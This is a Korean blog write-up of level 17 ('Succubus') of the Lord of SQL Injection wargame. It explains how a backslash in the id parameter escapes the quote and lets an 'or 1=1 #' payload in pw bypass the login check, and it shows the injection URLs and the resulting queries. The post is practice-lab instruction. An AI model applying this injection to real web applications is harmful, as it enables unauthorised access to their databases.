Lord Of SQL Injection [ 17.Succubus ]
2017. 9. 16. 18:54ㆍWebHacking/Lord of SQL injection
preg_match() 함수 ... 아직까지 취약점을 발견하지 못한 함수입니다
하지만 해당 문제에서는 preg_match()함수를 우회할 수 있는 방법이 있습니다
바로 " \ " 를 사용하는 것입니다
http://...php?id=\&pw=A |
=> SELECT id FROM prob_succubus WHERE id='\' and pw='A'
( WEHRE id = ' \' and pw= ' A ' )
\ 는 특수기호를 문자로 취급되게 만드는 기능을 한다
$_GET[id] = " ' and pw = " 이 입력되고 $_GET[pw] = " A " 가 입력된다
http://...php?id=\&pw=or 1=1 %23 |
=> SELECT id FROM prob_succubus WHERE id='\' and pw=' or 1=1 #'
=> 조건식은 항상 참이되어 결과값이 존재하게 된다 => 문제해결
'WebHacking > Lord of SQL injection' 카테고리의 다른 글
Lord Of SQL Injection [ 19.Xavis ] (0) | 2017.09.16 |
---|---|
Lord Of SQL Injection [ 18.Nightmare ] (0) | 2017.09.16 |
Lord Of SQL Injection [ 16.Zombie Assassin ] (0) | 2017.09.16 |
Lord Of SQL Injection [ 15. Assassin ] (0) | 2017.09.13 |
Lord Of SQL Injection [ 14. Giant ] (0) | 2017.09.13 |